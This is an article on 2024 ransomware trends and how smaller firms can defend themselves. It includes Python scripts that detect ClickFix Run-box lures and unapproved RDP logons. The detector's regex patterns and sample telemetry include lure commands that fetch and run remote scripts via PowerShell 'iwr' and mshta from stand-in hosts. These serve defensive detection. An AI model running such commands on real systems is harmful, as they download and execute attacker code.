Ransomware Cash-Out Is Down — But the Squeeze Has Moved to Main Street


Chainalysis tags 2024 as the first year since 2019 that total crypto value sent to known ransomware wallets fell quarter-on-quarter. The drop looks good on paper—until you realise the money simply moved sideways. Smaller firms are now carrying the weight, and the tactics used to collect it are faster, louder and cheaper.

  1. The Numbers That Matter
  • Median payment: USD 1.05 million (Q1 2024) → USD 580 k (Q4 2024)
  • Share of victims that pay: 34 % (2023) → 29 % (2024)
  • Data-leak-only attacks: 12 % of posts (2023) → 31 % (2024)

Source: Coveware incident response database, 1 812 cases, published March 2025.

  2. Why the Dip?
    Law Enforcement Shock Therapy
    LockBit and BlackCat infrastructure seizures in February and November 2024 scattered affiliates. Disorganised crews lack stable decryptors, so victims refuse to pay.
    Sanctions Stick
    OFAC’s Specially Designated Nationals list now carries six ransomware wallets. General counsel routinely blocks coins flowing through those addresses; crooks must price the legal risk.
    Payment vs. Pain
    High-profile disasters (HSE Ireland, Colonial Pipeline) proved that decryption keys arrive late or not at all. Boards are instructed to restore from backups first and negotiate later.
  3. The New Target Profile
  • 72 % of Q4 2024 incidents hit companies with < 1 000 staff
  • Average IT security head-count: 3.4 people
  • Cyber-insurance retention: USD 75 k—small enough to write the cheque, large enough to hurt
    Affiliates call it “spray-and-pray”: blast phishing e-mails by the million, demand six-figure ransoms that match the insurance deductible.
  4. Infection Vector Shift
    “ClickFix” Social Engineering
    Victims phone a fake support line and are told to paste a command into Windows Run. No macro, no attachment—e-mail filters miss it.
    Info-Stealer Feeder
    Browser-credential dumps sell for USD 20 per 1 000 lines. Affiliates filter for Remote Desktop or VPN log-ins, then drop ransomware the same night. Average dwell time: 1.8 days.
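The "ClickFix" chain above leaves a distinctive trace on the endpoint: an interpreter started directly by explorer.exe (the Win+R box) with a command line that hides its window or fetches something from the web. The following detection logic is an added example, not code from the article or any vendor tool. It assumes Sysmon Event ID 1 (or Windows 4688) records already reduced to dicts with the keys host, parent_image, image and command_line; the SAMPLE_EVENTS, host names and domains are constructed for the demonstration.

```python
"""Detect ClickFix-style Run-box launches in process-creation telemetry.

Added example, not code from the article. Assumes Sysmon Event ID 1 (or
Windows 4688) records reduced to dicts with the keys host, parent_image,
image and command_line. SAMPLE_EVENTS below are constructed, not real.
"""
import re
from dataclasses import dataclass

# Interpreters a ClickFix lure tells the victim to launch from Win+R.
INTERPRETERS = ("cmd.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "wscript.exe", "cscript.exe")

# Command-line traits that separate a pasted lure from a user merely opening a prompt.
SUSPICIOUS = {
    "cmd /c wrapper": re.compile(r"\bcmd(\.exe)?\s+/c\b", re.I),
    "encoded command": re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "remote fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|mshta)\b[^\n]*https?://", re.I),
}


@dataclass
class Finding:
    host: str
    traits: list
    command_line: str


def is_run_box_launch(event):
    """True when an interpreter was started directly by the shell (Win+R or the
    Start menu), which is how a pasted ClickFix command gets executed."""
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    return parent.endswith("\\explorer.exe") and image.endswith(INTERPRETERS)


def detect_clickfix(events):
    """Return one Finding per Run-box launch whose command line shows at least
    one suspicious trait; ordinary interactive prompts produce no finding."""
    findings = []
    for ev in events:
        if not is_run_box_launch(ev):
            continue
        traits = [name for name, rx in SUSPICIOUS.items() if rx.search(ev["command_line"])]
        if traits:
            findings.append(Finding(ev["host"], traits, ev["command_line"]))
    return findings


# Constructed sample telemetry (hosts, paths and domains are made up).
SAMPLE_EVENTS = [
    {"host": "WS-0142", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://verify.example.invalid/f"'},
    {"host": "WS-0177", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c mshta https://captcha.example.invalid/v.hta"},
    {"host": "WS-0203", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe"},  # user simply opened a prompt: benign
    {"host": "SRV-0009", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -File C:\\Scripts\\backup.ps1"},  # scheduled task, not Win+R
]

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"{f.host}: {', '.join(f.traits)} :: {f.command_line}")
```

The parent-process condition does most of the work: scripted automation runs under svchost.exe, a scheduler or an installer, so an interpreter whose parent is explorer.exe with a hidden window or a remote fetch is rare enough on a workstation fleet to be worth a ticket rather than a dashboard line.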
  5. Free Tools That Catch the New Wave
  • URLScan.io — detonates “ClickFix” pages in seconds; look for the string cmd /c inside user-facing scripts
  • RDPSec.ps1 — open-source script that disables RDP if the connecting IP is not in a pre-approved list (GitHub MIT)
  • Canarytoken.org — place a fake id_rsa file on shares; ransom crews scoop it up and reveal their exit IP
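The RDPSec.ps1 idea above (only pre-approved sources may reach RDP) is just as useful as a review rule over the logs you already have. The script below is an added example written for this article, not RDPSec.ps1 itself or any project code. It assumes Windows Security Event 4624 records flattened to one line each with EventID, LogonType, Account and IpAddress fields; the allowlist ranges, accounts and addresses in SAMPLE_LOG are constructed.

```python
"""Flag successful RDP logons (4624, LogonType 10) from outside an allowlist.

Added example, not the RDPSec.ps1 script named in the article. Assumes
Security Event 4624 records flattened to one line each; the ranges,
accounts and addresses below are constructed for the demonstration.
"""
import ipaddress
import re

# Pre-approved RDP sources: the VPN pool and one jump host (constructed values).
ALLOWED_SOURCES = [ipaddress.ip_network(n) for n in ("10.8.0.0/16", "192.0.2.10/32")]

LOGON_RE = re.compile(
    r"EventID=(?P<eid>\d+)\s+LogonType=(?P<lt>\d+)\s+Account=(?P<acct>\S+)\s+IpAddress=(?P<ip>\S+)"
)


def parse_logon(line):
    """Pull the four fields we need out of one flattened event line, or None."""
    m = LOGON_RE.search(line)
    if not m:
        return None
    return {"event_id": int(m["eid"]), "logon_type": int(m["lt"]),
            "account": m["acct"], "ip": m["ip"]}


def is_allowed_source(ip_text):
    """True only if the address parses and sits inside an approved range."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:  # 4624 uses "-" for console logons with no network source
        return False
    return any(addr in net for net in ALLOWED_SOURCES)


def review_rdp_logons(lines):
    """Return (account, ip) for each successful RemoteInteractive logon whose
    source is not pre-approved. Failed logons (4625) and non-RDP logon types
    are ignored so the list stays short enough to act on."""
    alerts = []
    for line in lines:
        ev = parse_logon(line)
        if not ev or ev["event_id"] != 4624 or ev["logon_type"] != 10:
            continue
        if not is_allowed_source(ev["ip"]):
            alerts.append((ev["account"], ev["ip"]))
    return alerts


# Constructed sample log (timestamps, accounts and addresses are made up).
SAMPLE_LOG = """\
2024-11-03T02:14:07Z EventID=4624 LogonType=10 Account=CORP\\jdoe IpAddress=10.8.12.44
2024-11-03T02:16:51Z EventID=4624 LogonType=10 Account=CORP\\svc-backup IpAddress=198.51.100.23
2024-11-03T02:17:02Z EventID=4624 LogonType=3 Account=CORP\\fileserver$ IpAddress=10.8.0.7
2024-11-03T02:20:19Z EventID=4624 LogonType=10 Account=CORP\\admin IpAddress=192.0.2.10
2024-11-03T02:21:40Z EventID=4625 LogonType=10 Account=CORP\\admin IpAddress=203.0.113.9
2024-11-03T02:22:05Z EventID=4624 LogonType=10 Account=CORP\\m.chen IpAddress=203.0.113.9
"""

if __name__ == "__main__":
    for account, ip in review_rdp_logons(SAMPLE_LOG.splitlines()):
        print(f"RDP logon outside allowlist: {account} from {ip}")
```

A service account logging on interactively over RDP from an address outside the VPN pool is exactly the pattern the info-stealer feeder produces, and with a 1.8-day dwell time the alert has to be reviewed the same day it fires, not in the weekly report.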
  6. What to Do Before 1 December 2025
  • Force MFA on all privileged accounts (not just external). NYDFS fine sheet shows USD 450 k penalties for shared service accounts left out.
  • Cap insurance deductibles at 0.5 % of annual revenue; anything higher invites a quick pay-out culture.
  • Add a “no-payment” clause to incident-response retainers; insurers reimburse restoration costs, not ransom payments.
  7. Bottom Line
    Ransomware is still profitable—just smaller, faster and aimed at the firms least able to fight back. Cut the easy paths (stolen creds, open RDP), shrink the deductible and make payment the last line on the decision tree. The crooks will move on to an easier mark—and your holiday break stays intact.